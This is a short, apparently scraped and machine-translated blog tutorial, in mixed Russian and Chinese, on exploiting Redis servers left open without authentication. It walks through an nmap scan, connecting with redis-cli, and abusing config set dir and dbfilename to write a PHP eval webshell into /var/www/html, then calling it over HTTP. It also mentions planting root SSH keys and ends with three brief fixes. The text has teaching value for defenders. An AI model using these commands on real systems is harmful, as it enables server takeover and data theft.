Веб-безопасность: тест Redis на уязвимость несанкционированного доступа.

Веб-безопасность: тест Redis на уязвимость несанкционированного доступа.

По умолчанию Redis привязан к порту 6379, и если правила брандмауэра не добавлены, чтобы избежать других связанных политик безопасности, таких как IP-доступ из ненадежных источников, он будет напрямую открыт для общедоступной сети. Тогда пароль не устанавливается или устанавливается слабый пароль, что и приводит к данной уязвимости.


Оглавление:

Веб-безопасность: тест Redis на уязвимость несанкционированного доступа.

Вред уязвимости несанкционированного доступа Redis:

Тест Redis на уязвимость несанкционированного доступа:

Шаг 1: Используйте инструмент nmap для сканирования портов.

Шаг 2. Проверьте, можете ли вы подключиться к Redis и получить конфиденциальную информацию.

Шаг 3. Используйте несанкционированную уязвимость Redis для загрузки программы (троянский конь)

Шаг 4: Получите доступ к загруженной программе (троянский конь)

Шаг 5: Используйте загруженную программу (троянский конь) для подключения к серверу, чтобы получить контроль.

Метод устранения уязвимости несанкционированного доступа в Redis:


Вред уязвимости несанкционированного доступа Redis:

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据,可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话,攻击者可以给root账户写入SSH公钥文件,再直接SSH登录目标服务器.

Тест Redis на уязвимость несанкционированного доступа:

Шаг 1: Используйте инструмент nmap для сканирования портов.

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379            //扫描 6379 端口是否开放.


Шаг 2. Проверьте, можете ли вы подключиться к Redis и получить конфиденциальную информацию.

sudo redis-cli -h 192.168.0.101        //连接 Redis 数据库.

info                                   //查看 敏感 信息.


Шаг 3. Используйте несанкционированную уязвимость Redis для загрузки программы (троянский конь)

config set dir /var/www/html        //在网站的根目录/var/www/html下写进去一个脚本.
config set dbfilename bgxg.php        //脚本名称为 bgxg.php
set webshell "<?php @eval($_POST['bgxg']); ?>"        // 脚本内容" 中 "的内容.
save            // 保存 刚刚写入的信息.


Шаг 4: Получите доступ к загруженной программе (троянский конь)

http://192.168.0.101/bgxg.php        // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo();                      // phpinfo(); 查看服务器的信息.


Шаг 5: Используйте загруженную программу (троянский конь) для подключения к серверу, чтобы получить контроль.


Метод устранения уязвимости несанкционированного доступа в Redis:

(1)Redis 添加密码验证.

(2)禁止外网访问 Redis 端口服务.

(3)修改 Redis 服务 默认端口.

    

     

      

Supongo que te gusta

Origin blog.csdn.net/weixin_54977781/article/details/130900745
Recomendado
Clasificación